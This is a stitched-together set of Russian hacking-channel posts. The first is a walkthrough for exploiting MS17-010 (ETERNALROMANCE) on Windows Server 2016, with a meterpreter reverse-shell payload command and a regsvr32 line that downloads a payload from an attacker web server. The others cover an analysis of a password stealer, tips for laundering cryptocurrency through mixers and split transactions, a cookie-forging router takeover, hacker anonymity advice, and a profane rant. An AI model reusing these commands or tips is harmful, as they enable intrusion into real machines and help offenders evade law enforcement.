(Автор: Sheila A. Berta (@UnaPibaGeek))

Введение

Когда компания Microsoft выпустила патчи для уязвимости MS17-010, было сообщено, что проблема касается платформ, начиная от Windows 7 (если быть совсем точным, то и Windows Vista тоже) и заканчивая Windows Server 2016. Хотя эксплоиты под кодовым названием "ETERNALS", опубликованные группой TheShadowBrokers, которые пригодны для эксплуатации в Windows Server 2012 и более современных системах, - очень нестабильны и в 99% случаев вызывают BSOD на машине жертвы.

С целью понимания и улучшения эксплоитов от NSA, опубликованные работы были проанализированы многими специалистами по безопасности. Как итог, некоторое время назад появилась более стабильная версия (разработанная исследователем Sleepya) эксплоита ETERNALROMANCE/SYNERGY с улучшенным методом эксплуатации и направленным на системы под управлением Windows Server 2012 и 2016. Однако для того чтобы использовать этот эксплоит необходимо разобраться в механизме работы этого скрипта и модифицировать некоторые вещи для получения желаемого результата.

В этой статье будут даны пошаговые рекомендации для того, чтобы эксплоит работал корректно, а также разъяснения относительно модификации с целью получения meterpreter-сессии на целевой машине.

Как обычно, вся информация приводится в ознакомительных целях.

Настройка лабораторной среды

Для настройки лабораторной среды нужно сконфигурировать следующие системы:

Целевая система - Windows Server 2016

Эта машина с установленной 64-битной операционной системой Windows Server 2016 будет использоваться в качестве целевой.

После установки операционной системы дополнительные настройки не требуются. Достаточно знать IP-адрес и убедиться в том, что машина включена на момент атаки.

Система злоумышленника - GNU/Linux

Возможно использование любой другой операционной системы, которая поддерживает работу следующих инструментов:

• Python v2.7 - https://www.python.org/download/releases/2.7/
• Ps1Encode - https://github.com/CroweCybersecurity/ps1encode
• Metasploit Framework - https://github.com/rapid7/metasploit-framework

В итоге у нас есть две настроенные машины, используемые в лабораторной среде:

• Windows Server 2016 x64 – IP-адрес: 10.0.2.13 - Целевая система.
• GNU/Linux Debian x64 – IP-адрес: 10.0.2.6 - Система злоумышленника.

Получение эксплоита

Эксплоит можно скачать по следующей ссылке:

https://www.exploit-db.com/exploits/42315/.

Поскольку скрипт написан на Python, сохраняем файл с расширением .py на машине злоумышленника. Во время запуска возникает следующая ошибка:

Решение проблем с зависимостями

В третьей строке эксплоита импортируется модуль "mysmb", которого нет в Python. Установить этот модуль, разработанный Sleepya, можно установить при помощи утилиты pip, либо скачать по следующей ссылке: https://github.com/worawit/MS17-010/blob/master/mysmb.py.

Файл модуля с именем "mysmb.py" помещаем в папку со скриптом. Для того чтобы эксплоит смог импортировать код модуля, необходимо создать файл с именем «__INIT__.py» с перечнем нужных модулей.

Теперь скрипт сможет найти нужный модуль и не будет выдавать ошибок:

Проверка работоспособности эксплоита

Возможна проверка работоспособности эксплоита без каких-либо модификаций. Если мы запустим скрипт как есть по завершению работы в корневой директории диска C:\ на целевой машине будет создан файл с именем "pwned.txt".
Несмотря на то, что в простейшем случае никакие изменения не требуются, конкретно в вашей ситуации может потребоваться модификация некоторых параметров.

Аутентификация

Уязвимость, используемая в эксплоите ETERNALROMANCE/SYNERGY, требует аутентификации. Эксплуатацию можно осуществить через гостевую учетную запись. Если гостевой аккаунт отключен, нам нужно получить имя пользователя и пароль любой другой учетной записи, которая используется на целевой машине. Важно отметить, что уровень привилегий не имеет значения. Даже если учетная запись с гостевыми правами, после атаки привилегии будут повышены до системного уровня.

Информация об учетной записи задается в файле exploit.py в строках 26-27:

Параметры

Для корректной работы эксплоита необходимо настроить два параметра: IP-адрес целевой машины и имя канала (pipe name). Протокол SMB поддерживает три типа общих ресурсов:

• File: файловые (или дисковые) общие ресурсы, представляющие собой дерево директорий с файлами.
• Print: доступ к ресурсам принтера на сервере.
• Pipe: коммуникация между процессами, использующими модель FIFO, при помощи именованных каналов, которые активны до тех пор, пока система работает, даже если процесс уже не активен.

В отличие от ETERNALBLUE эксплоиты ETERNALROMANCE и ETERNALSYNERGY используют именованные каналы, и, соответственно, нужно выбрать тип канала, который необходим во время атаки.

Лично я пользуюсь «spoolss». Альтернативный вариант: «browser». Кроме того, можно воспользоваться сканером auxiliary/scanner/smb/pipe_auditor в metasploit для поиска доступных каналов на целевой машине.

Запуск без шелл-кода

Теперь запускаем эксплоит при помощи следующей команды:

python exploit.py <target_ip> spoolss 

Как было сказано ранее, если эксплуатация завершилась успешно, в корневой директории диска «C:\» появится новый файл «pwned.txt».

pwned.txt

На данный момент мы уже сделали большой шаг, выполнив успешную эксплуатацию. Теперь нужно модифицировать эксплоит так, чтобы запустить шелл в meterpreter.

Создание шелл-кода

Существует множество способов запустить meterpreter-шелл или выполнить какие-либо другие действия вместо создания текстового файла.

Первый шаг – генерирование шелл-кода, который мы будем использовать в дальнейшем. Лично я очень люблю один метод, у которого масса преимуществ, когда речь заходит про обход различных защит.

Шелл-код будет помещен в файл .SCT, который эксплоит будет загружать и запускать на целевой машине, в результате чего мы получим долгожданную meterpreter-сессию.

Создание файла .SCT при помощи утилиты PS1ENCODE

Ps1encode позволяет сгенерировать и закодировать полезные нагрузки для metasploit в различных форматах на базе PowerShell.

Эту утилиту можно загрузить на github: https://github.com/CroweCybersecurity/ps1encode.

Для генерирования нужной полезной нагрузки нам необходимо запустить Ps1encode со следующими параметрами:

 ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST=<ATTACKER_IP> --LPORT=4444 -t sct

Сгенерированный файл .SCT должен храниться на веб-сервере на машине злоумышленника или в любом другом месте, к которому можно получить доступ из целевой системы. Поэтому при запуске предыдущей команды задается вопрос о том, какой будет полный URL, где мы будем хранить файл .sct. Если будет использоваться машина злоумышленника, нужно ввести следующий URL: http://<ATTACKER_IP>.

Помещение шелл-кода в место, доступное из целевой системы

На предыдущем шаге мы создали файл index.sct в папке утилиты Ps1Encode. Чтобы этот файл был доступен для загрузки эксплоитом на целевой машине мы должны поместить полезную нагрузку в папку веб-сервера и назначить нужные права.

После выполнения команд, показанных на рисунке выше, у нас появляется шелл-код, готовый к употреблению.

Изменение эксплоита

Если мы откроем скрипт в текстовом редакторе и перейдем к строке 463 (и ниже), то увидим следующий код:

На рисунке выше показаны функции, используемые для создания файла «pwned.txt» на целевой машине. Более интересной для нас является закомментированная строка с функцией service_exec().

Функция service_exec() в качестве примера выполняет команду «copy» для создания копии файла «pwned.txt». Эта строка кода не будет выполняться до тех пор, пока вначале стоит символ «#». Если убрать этот символ и запустить эксплоит повторно, мы увидим, что в корне диска «C:\» появилось два файла: pwned.txt и pwned_exec.txt.

Вместо команды copy можно поставить любую другую, которая нам необходима.

Запуск шелл-кода

Теперь мы знаем, в каком месте нужно модифицировать эксплоит для выполнения команды загрузки и запуска шелла в meterpreter:

 regsvr32 /s /n /u /i:http://<attacker_webserver_ip>/shellcode.sct scrobj.dll 

Эксплоит будет выглядеть так:

Получение Meterpreter-сессии

В самом конце, перед запуском эксплоита, мы должны настроить модуль exploit/multi/handler для получения meterpreter-сессии.

Далее запускаем модифицированную версию эксплоита:

Через несколько секунд мы получим meterpreter-сессию на целевой машине с системными привилегиями.

The End.

В этой статье ты узнаешь:

• Как перехватить траффик вируса, и проанализировать его
• Как проанализировать систему на изменения.
• Как изучить код малвари. Реверс инжиниринг.

Анализ трафика.

Пожалуй, одно и самых нужных вещей, при анализе вируса. И так, для анализа исходящего траффика используется специальные программы - снифферы. Наиболее популярные из них:

• WireShark
• Fiddler
• Burp Suite

Рассмотрим, что мы сможем узнать о вирусе, по его запросам.

Открываем наш сниффер, в моём случае это Fiddler:

Запускаем вирус, затем смотрим, какие запросы были отправлены:

Проанализируем их. Первый запрос полетел на этот сайт: http://ip.42.pl/raw

При переходе на него покажется ваш внешний IP, малварь использует этот сайт что-бы спарсить ваш ИПшник.

Второй запрос отправился на домен, при переходе на него было показано следующее:

Все эти цифры нужны для парса функций софта. Приведу пример. Когда софт сделал запрос, и скопировал цифры, происходит проверка: Если первая цифра == 1, то софту нужно украсть логи;пароли, как пример в псевдокоде, но думаю, ты понял.

Когда вы получили домен панели, можно так-же и провести анализ самой панели на уязвимости, накидать брут, спиздить логи. Для малварь-хантеров панель очень важная зацепка, т.к если панель стоит на не-абузоустойчевом хостинге, они могут отправить запрос к администрации, с просьбой предоставить всю инфу о владельце этого домена. Ну а там по нарастающей..

Конечно, разработчики малвари должны понимать, что рано или поздно, его детище начнут изучать, но если ты думал, что от анализа трафика нет защиты, ты крупно ошибаешься. Я например в своём софте сделал Анти-Анализ, и в одном из методов просто проверял запущенные процессы, и если среди них был процесс снифера, софт самоуничтожался, как то так.

Поведение системы.

Чтобы отследить создание файлов, папок, операции с регистром, чаще всего используется программа Process Monitor

Но прежде чем начать анализировать систему следует настроить фильтры.

Заходим во вкладку "Filter => Filter..."

Добавляем нужный фильтр - Process Name, begins with, имя_процесса, Include:

Так-же добавляем фильтр на папку Windows, это нужно для того, чтобы когда малварь обращается к какой-либо DLL'ке, у нас не было лишних записей.

Теперь в главном окне выбираем, что отслеживать: Активность регистра, Файловую систему, Сетевой траффик, Потоки

Теперь всё готово, запустим анализ системы сочетанием клавиш: CTRL + E.

Далее запускаем наш вирус и смотрим вывод,

Проанализируем некоторые действия. Первым, что делает софт, это создаёт папку в Temp директории с именем пользователя и скрывает её:

Затем получает пути до БД файлов хромиум браузеров - Login Data, в которых содержаться логины и пароли, так-же копирует этот файл в временную директорию

После этого вытаскивает из всех БД пароли, куки, историю браузера и записывает по файлам

Ну и дальше, он действует так-же как и другие вирусы подобного типа, собирает файлы с рабочега стола, стима, телеграма. Потом архивирует папку и отправляет на домен, что был при анализе траффика.

На этом с анализом системы, и созданных файлов закончим, перейдём к следующему пункту.

Реверс-инжиниринг.

(Статья про реверс Python приложений)

Реверс инжиниринг — исследование некоторого готового устройства или программы, а также документации на него с целью понять принцип его работы; например, чтобы обнаружить недокументированные возможности (в том числе программные закладки), сделать изменение или воспроизвести устройство, программу или иной объект с аналогичными функциями, но без прямого копирования.

Реверсинг сродни крэкерству, однако под реверсингом чаще понимается восстановление исходного кода программы из исполняемого кода, часто реверсинг кода может быть даже не связан с алгоритмом защиты программ.

В этой статье я лишь задену самые основы реверса .Net приложений

Инструментарий.

Для реверса нам необходимы программы:

1. ExeInfoPE / RDG Packer Detector
2. dnSpy

ExeInfoPE и RDG Packer Detector выполняют одну (из) важную функцию для реверса - Узнать ЯП на котором написана программа.

dnSpy - Инструмент для дизассемблирования, говоря простым языком эта утилита позволит нам доставать весь код из exe файла.

DnSpy включает в себя декомпилятор, отладчик и редактор сборки. Он может быть легко расширен путем написания собственного расширения.

Перейдём ближе к делу, отрываем dnSpy, и перекидываем туда наш файл

И если результат оказался примерно таким, то тебе повезло вирус не обфусцирован.

Обфускация - приведение исходного текста или исполняемого кода программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и модификацию при декомпиляции

Ну и вызовы методов

Заключение.

Вот и всё, в этой статье мы лишь поверхностно затронули такую тему, как анализ вредоносных программ. Если тебя заинтересовала эта тема, то для начала советую выучить хотя бы пару языков программирования, что бы после понимать, что происходит в коде. Затем освоить реверс, попрактиковаться с деобфускацией, поработать с IDA Pro. На этом всё,

На этом всё, канал DARK $IDE, админ 3XPL01T.

D$ 2.0

• Насколько анонимен биткоин?
• Какие криптовалюты являются более анонимными.
• Как отслеживают подозрительные транзакции.
• И всё таки, как быть более анонимным используя именно эту криптовалюту.

Усаживайся поудобнее, маски-шоу начинается!

Миф №1. Анонимность биткоина..

Давай вспомним, по какой причине люди считают биток анонимной криптой.

Отличие от простых банковских/электронных транзакций, криптовалютные переводы не нуждаются в приличном объёме информации о тебе, например такой как: ФИО, номер телефона, паспортных данных, etc.

Также криптовалютные платежи не привязываются к конкретному лицу.

Переводы в системе проверяются случайно выбранными узлами связи, связанными между собой посредством IP-адресов. Для узлов связи остается неизвестным какой из узлов связи создал транзакцию, а какой только перенаправил ее.

Да, биткоин действительно не собирает о тебе тонну личной информации, но разве это может сделать тебя действительно анонимным? Нет.

Биток как минимум не скрывает данные о твоих транзакциях. Откуда и кому прилетели заветные монетки, дата в твоём часовом поясе, всё это находится в открытом доступе. АнОнИмНоСтЬ?

Какие криптовалюты являются более анонимными?

Не смотря на мейнстрим битка в последнее время, шарящие люди пользуются другими криптовалютами. Какими? - Давай расскажу тебе вкратце.

• Monero. Анонимная криптовалюта, в которой информация в блокчейн реестр добавляется в искаженном виде, что существенно усложняет отслеживание пользователей.
• Dash. Анонимность в системе достигается за счет смешивания монет пользователей. Анонимная транзакция не идет напрямую к пользователю, в начале она направляется в мастерноду, где транзакции “дробятся” на мелкие части и перемешиваются между собой в несколько этапов, после чего формируются в новые транзакции и отправляются получателям. Таким образом, связь между отправителем и получателем разрывается.
• Zcash. Конфиденциальность пользователя в системе достигается благодаря применению протокола нулевого разглашения. Он работает по принципу: чтобы проверить транзакцию, достаточно подтвердить факт ее существования, но не нужно знать адреса получателя и отправителя.

Из всего выше перечисленного, лично я бы рекомендовал пользоваться Dash'ом.

Как отслеживают подозрительные транзакции и устанавливают личность хозяина Bitcoin-кошелька.

Большинство людей использующих криптовалюту, чтобы их личность установили, у каждого есть на это свои причины.

Перестань думать, что криптовалютой пользуются только для покупки шишек на трёхголовой, или для покупки оружия, хакерских услуг, и так далее. На самом деле с криптовалютой отмывают столько денег добытых не совсем честным способом, что голова просто разрывается от количества нулей на чужом счёте. Ещё как вариант, у меня были знакомые, которые избегали налогов используя крипту. Как? Пусть останется новой тайной этого канала..

Как привяжут личность к кошельку биткоин.

Допустим, некто совершил покупку в онлайн магазине и рассчитался биткоином. На сайте продавца потребовалось указать ФИО и адрес доставки. С этого момента адрес покупателя нельзя назвать анонимным, поскольку произошла привязка к личным данным и теоретически на основе этих данных уже может быть доказана причастность владельца адреса ко всем предыдущим и последующим транзакциям.

Как остаться в тени?

• Сокрытие IP-адреса. Существует вероятность, что IP-адрес, с которым связана транзакция, может быть отслежен, поэтому при проведении операций с криптовалютами рекомендуется использовать TOR и другие сервисы для сокрытия адреса.
• Новый адрес для каждой транзакции. Использования разных адресов для входящих и исходящих транзакций существенно усложняет идентификацию личности и делает невозможным подсчет точного количества монет на кошельках пользователя. В большинстве кошельков эта новый адрес генерируется автоматически для каждой транзакции.
• Большие транзакции. Рекомендуется избегать крупных транзакций, ведь именно они в первую очередь привлекают внимание контролирующих органов и злоумышленников. При необходимости совершить крупный платеж рекомендуется разделить сумму перевода на несколько отдельных, не слишком существенных транзакций и провести пересылку с разных адресов.
• Биткоин-миксеры. Существуют специальные сервисы, позволяющие перемешивать монеты и усложнять их отслеживание. С их помощью пользователь может отправить энное количество монет, которые будут смешаны с монетами других пользователей и в итоге на счет поступят уже новые монеты, не связанные с предыдущими транзакциями.

Самыми эффективной связкой является: Использование TOR'a + Новый адрес + Биткоин миксеры + Обменники (но тут уже по желанию).

Миксеры. Что это и с чем едят.

Чтобы понять, что такое Биткоин Миксер, я просто расскажу тебе принцип его работы:

Cайт принимает криптовалюту множества человек, затем использует алгоритмы для смешивания и отправляет биткоины по разным кошелькам. Поскольку транзакции перемешиваются, миксуются, у подобного сервиса появилась такое название — миксер криптовалют.

Как только микширование будет завершено, монеты будут отправлены обратно с вычетом комиссии за обслуживание. Эта плата, как правило, зависит от нескольких факторов, в том числе количество смешиваний, а также количество отправленных монет.

Если тумблер справился успешно, то монеты не могут быть связаны с вами.

Подробнее можно почитать тут: Биткоин-миксер: лучший способ сохранить анонимность криптовалюты

Заключение.

Как оказалось, биткоин не является анонимной криптой, хотя сколько споров было на этот счёт.

Надеюсь, что это статья была тебе полезна, на этом всё, удачи.. и оставайся анонимным...

//D$ LTD//

Dark $ide -- Твоя тёмная сторона.

Взлом роутера обычно является либо самой простой, либо самой сложной задачей - его сложность варьируется от ввода имени пользователя и пароля по умолчанию, и ты максимально заебёшься, пытаясь попасть внутрь роутера по telnet или ssh.

В обоих этих случаях перебор паролей не очень полезен, но это довольно простой метод, мы ведь не ищем лёгких путей, да?

Для этой статьи я собираюсь использовать роутер CBN CH6640E. Если хорошенько погуглить, ты поймёшь, что он не из самых новы, поскольку был выпущен в 2011 году, а также есть целый пост в exploit-db.com об этом говорит многое).

Однако я скажу тебе следующее: Это все еще роутер, который я использовал в своей домашней сети, потому что он предоставляется моим интернет-провайдером, и поскольку он является одним из основных поставщиков в моей области, многие люди страдают от этих уязвимостей.

Ну ладно, теперь к делу.

ЭТАП I. НАЙДИ IP РОУТЕРА.

Так как это самый простой шаг, и есть бесчисленное множество способов сделать это, я просто приведу несколько различных возможностей:

• Проверка сетевых настроек с помощью панелей настроек ОС
• Использование ipconfig в Windows и ifconfig на машинах Unix из терминала
• Использование Fuzzer в качестве инструмента обнаружения цели.

Найденный мной IP роутера - 192.168.0.1

ЭТАП II. СОБЕРИ ТРАФФИК.

Я решил, что хороший способ начать, будет исследовать веб-сервер роутера для чего-то за пределами того, что видно невооружённым глазом. По этой причине я использовал HTTPView и проанализировал трафик от первой попытки входа в систему. Чтобы помочь себе, я применил некоторые фильтры, чтобы избавиться от медиа и стилей ответов с сервера. Вот результат, который я добыл:

ЭТАП III. ПРОАНАЛИЗИРУЙ ТРАФФИК И НАЙДИ УЯЗВИМОСТИ.

Теперь, когда у нас есть нужное колчиство данных, мы должны проанализировать его, чтобы увидеть, наткнулись ли мы на что-то интересное. Сразу можно игнорировать все файлы jQuery, а также языковые файлы или, по крайней мере, не начинать поиск оттуда. Поскольку я работаю в Chrome, я не могу анализировать ответы прямо из HTTPView, поэтому мне нужно реплицировать запрос в Rest и выполнять там анализ.

Есть этот интересная штука, которую я нашел в /menu.html

Хотя определение функции readCookie отсутствует, можно с уверенностью предположить, что она считывает файл cookie, а userData-это имя этого файла cookie.

Из строки 247 мы можем сделать вывод, что значение этого файла cookie должно быть root. Чтобы изменить куки, я использовал расширение EditThisCookie и добавил файл куки с уже упомянутым именем и значением и вуаля, мы внутри..

ЭТАП IV. ПРОСКАНИРУЙ РОУТЕР НА НАЛИЧИЕ ДРУГИХ ROOT'ОВ.

Если мы попытаемся перемещаться в любом месте, мы встретим тот же экран входа в систему.

Есть что-то еще, необходимое для изменения настроек роутера. Однако, у нас есть доступ к гораздо большему количеству страниц, поэтому я думаю, что стоит сделать сканирование на маршрутизаторе.

Для этого я буду использовать сканер с уже установленным файлом cookie userData=root. В addiotion я включу опцию "направленное сканирование" на вкладке второго пилота, чтобы сканер полагался на мои действия в качестве ввода.

После запуска сканера перейдите к 5-10 страницам на маршрутизаторе, которые требуют входа в систему, например /basicSetup.html и / или basicDHCP.html и пусть инструмент делает свою работу.

После того, как траффик перестал поступать, мы можем проанализировать результаты для интересных выводов. Для этого я предпочитаю сортировать результаты по пути, чтобы убедиться, что я не пропустил ни одного важного файла или каталога. И через некоторое время я столкнулся с этим:

ЭТАП V. ПОЛУЧИ ПОЛНЫЙ КОНТРОЛЬ.

DocsisConfigFile.xml - это обычно файл, который содержит кучу полезной информации о конфигурации маршрутизатора, посмотрим, что внутри:

Это определенно работает - файд содержит много интересной информации, включая имя пользователя и пароль в обычном тексте, благодаря которым мы и получили полный доступ.

Заключение.

Как видишь, даже каких-либо 0day экплоитов нам не понадобилось, чтобы получить полный контроль над роутером..

Ну а с какой целью взламывать роутеры, я расскажу чуть позже, если эта статья тебе понравится, понимаешь о чём я?)

//D$ LTD//

Dark $ide -- Твоя тёмная сторона.

- Так с чего же мы начнём?

- Давай с выдуманной истории.

Представим, существует хацкер Вася. Вася любит воровать кэш у наших друзей из-за бугра. Вася пиздит важные документы с ООО "Рога и Копыта", распространяет малварь в неебическом размере, держит свой ботнет.

Короче говоря - Вася тру. Казалось бы, Вася не дурак, использует все средства анонимности: ВПН, ТОР, левый ноут, ТруКрипт, все дела. Но давай разберёмся, насколько наш Вася анонимен, и как его смогут найти серьёзные дядьки..

VPN.

Вспомним нашего хакера, Вася намутил себе ВПН в каком-нибудь Берлине, захотелось ему нагадить компании "Рога и Копыта", И вот, разослав последнее фишинговое письмо, Васе удалось украсть всё, что представляло ему интерес. Что происходит дальше? Директор компании обращается к ребятам в погонах, они, с помощью системы оперативно розыскных мероприятий, дают запрос провайдерам России-матушки, как стационарным, так и мобильных операторов. Спрашивают, кто подключался к такому-то IP адресу Берлина, ведь они видели лишь IP Берлина, но не видели IP-шник Васи. Наш интернет провайдер посмотрит по логам и естественно сдаст нас, что мы подключались к этому IP адресу. Всё. Васе пизда, не смотря на то, что ВПН был "приватным"/"не сливающим"/"личным".

Ну ладно, не может же быть Вася настолько глупым, он использует не один ВПН сервер, а связку.

Так вот, представим новую связку. Вася из Залупинска подключается в Амстердам, затем к Берлину. А потом заходит на ресурс и вновь совершает противозаконные действия.

Начало развития событий одинаковы - опять обращаются к ребятам в погонах, опять система оперативно розыскных мероприятий. Что они будут искать? Они ищут на выходе наш Берлиновский IP. Дают запрос провайдерам РФ - кто подключался к нему? А никто не подключался. Почему? Потому что наш провайдер видит только подключение к Амстердаму, но не видит подключения к Берлину. А пострадавший видит лишь подключение из Амсердама.

Казалось бы, вот она - АНОНИМНОСТЬ, которую так желал наш хакер. Но не спеши с выводами, мой друг. Всё не совсем так безопасно, давай разбираться.

На самом деле всё очень просто - любой айпи принадлежит провайдеру, а он ведет логи и видит кто к кому подключался. Связываются с провайдером IP Амстердама, узнают кто арендует сервер, дают запрос арендатору и он сдает с потрахами кто к нему в это время подключался и точно так же потом идут к следующему серверу и на выходе получают ваш IP. ЭТО ЛИШЬ ДЕЛО ВРЕМЕНИ.

Так-что если ты думал, что подрубив дабл-впн ты станешь анонимным, можешь начать параноить, ведь если ты натворил дел, суши сухари.

Теперь разрушу миф о "не сливающих" серверах. (Слова не мои, нашёл в тырнетах)

Бытует мнение что можно взять VPN в Панаме, Катаре и все будет хорошо.

Это только отчасти так. Почему? Потому что официальными запросами добиться можно все.

Рассмотрим как работают спецслужбы с той же самой Панамой. Панама не выдает никому никогда никакие данные, НО кроме спецслужб США :)

Соответственно, спецслужбы РФ дают запрос в Интерпол, указывают IP адрес и указывают причастность к терроризму. Интерпол передает этот запрос к спецслужбам США, а те соотвественно в Панаму. И точно так же ответ идет обратно.

Та же схема работает и с Катаром, за исключением что они дают запрос в Саудовскую Аравию.

В любом случае нас найдут, если захотят.

Но мы не прячемся от спецслужб, верно же? :)

Мы лишь рассматривает спецслужбы как эталон в деанонимизиции.

TOR.

Ладно, не все же хакеры довольствуются одним впн-ом, есть же тор, с которым всё станет максимально безопасно.... или нет?

И вот немного другая ситуация, Вася хочет проверить свой ботнет, который хостится на абузоустойчевом сервере...

Стоп-стоп, погоди, давай-ка на момент вспомним, как работает ТОР, вкратце. Когда ты, дыркнетчик, мамин нетсталкер, заходишь в даркнет, на .onion сайты - то все пучком, трафик находится в зашифрованной сети и мы находимся в безопасности.

Но что будет если мы с тора зайдём в клирнет?

А если мы хотим зайти в http то есть в сеть интернет, с браузера тор, то наш трафик автоматически расшифровывается через выходной узел (далее это будет называться нода), потому что сеть интернет не может читать трафик тора и для этого созданы выходные узлы, которые “конвертируют” трафик тора в трафик интернет.

И тем самым мы просматриваем уже http сайты с тора, но тут есть опасность. Стать владельцем Выходного узла может каждый, в том числе и спец службы.

Как там ботнет? Всё бы неплохо, но блять, Вася совсем забыл, что собственную ноду поднять дело нескольких десятков минут, вместо этого он лучше позалипает на свои доходы, и будет рад тому. Человеческий фактор.

Лень + Чувство неуязвимости . Эта простая связка человеческих факторов губит таких как мы.

И вот, малварь-хантеры при анализе ботнета Васи, обнаружили, что ботя подключается к IP сервера, на котором стоит админ-панель, далее всё по аналогии, как и с ВПНом, дают запрос к администрации сервера, ну а дальше вы уже сами знаете.

Ну а если Василий всё таки параноик и подрубил свою ноду?

Спешу сразу же тебя огорчить, перехватить трафик через ноду вполне возможно, не буду рассказывать как это сделать, но если тебе так интересно, почитай, будет полезно:

Снифаем выходную ноду Tor’а и анализируем получившийся контент.

TrueCrypt / VeraCrypt / etc..

Ну тут тоже всё довольно просто: подбор пароля, при котором будет использовано все твои данные с ПК.

Ну опять же, Вася не глуп, и он поставил просто нереально сложный пароль, как спец.службы смогут добыть ключ к крипто-контейнерам?

Лови сразу несколько вариантов:

1. Взлом криптоконтейнера через уязвимость алгоритма или ПО
2. Терморектальный криптоанализ
3. Получение доступа с помощью трояна или кейлоггера
4. Криминалистический анализ оперативной памяти
5. Взлом криптоконтейнера при помощи запасного ключа

Подробнее тут: Способы взлома криптоконтейнеров

Заключение.

Думал ли ты когда-нибудь, что такое настоящая, 100%-ная анонимность?

Вот и я нет, а знаешь почему? Потому-что её не существует. Тем более в нынешнее время, когда человек с форума продаёт "МЕГА-СКРЫТЫЕ ДАТА-ЦЕНТРЫ В ЛИВАНЕ", а на деле выходит, что все сервера находятся в Одесском подвале.. Ты же слышал эту историю?)

Это будет одна из статей, в которых я расскажу, о твоих новых страхах, и сделаю тебе параноиком (это кстати, в нашей сфере, не так уж и плохо).

Сегодня показал, как тебя найдут, дальше расскажу, что будет, когда к тебе постучат в дверь. На этом всё, желаю удачи тебе, аноним.... (ахахахах, аноним, ладно, до встречи, скрип-кидос))

! ALERT ! Слишком много мата, плоских шуток, и дыркнета.

Dark Angel -- История одного какера..

Начнём мы с такого существа, который именует себя как Тёмный Ангел. Если просмотреть все первые посты с этого канала, то сразу поймём - очередняра-копипастер, мамкин даркнетчик, повествующий детям о том, как "Как обойти ограничение прослушивания музыки в ВКонтакте" или "Как бесплатно и эффективно раскрутить instagram"

Всё это дерьмо продолжалось до этого поста:

QUE 1SC - хакер широго профиля!11! Всмысле не слышал? Может ты и про DarkAngela не знаешь? Мммм, ясно, не шаришь, я на приватных форумах сижу в дыркнете, через тор, без ява... жава... javascript'a!!111!

Постирония уровня: Админ D$

Мы с Вами перешагнем эту черту - от копипастных схем... И начнём постить копипастные/рерайтные статьи, но про копипасты чуть позже...

Ну а теперь поговорим про биполярочку нашего коекакера

Что касательно обучения, это просто слив курса от Plastik'a (Press F, за пластика, привязывайте блять доп. аккаунты к каналу).

Университет 3,0 УЛЬТРА ОБНОВЛЕНИЕ (хуй там)

Просто давайте сравним, обучение слитое мной (точнее моим подписчиком)) и дополнение от Ангела:

Ну и как, будем покупать обучение, где нам расскажут о том, как создать стиллер на питоне, или ещё хуже, ддосить через LOIC, это даже блять не шутки, всё действительно настолько хуёво, что просто пиздец:

Ну и как, папищике Hacker Place'a и Dark Angel'a, как вам такое? А? До сих пор думаете, что эти статьи пишет админ-хукер? НЕТ! эти каналы просто проект для выкачивания из людей денег, который, к сожалению, ещё жив, и будет жить ещё долго, дураков хватает всегда.

Давайте взглянем на авторские статьи, которыми нас кормит наши админы:

...

От слова Dark меня уже тошнит, скоро я изменю всё, оставя тематику, пора выебать телеграм, готовьтесь псы, стая выходит в свет.

революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция иди спать, заебал, революция, ре, революция, революция,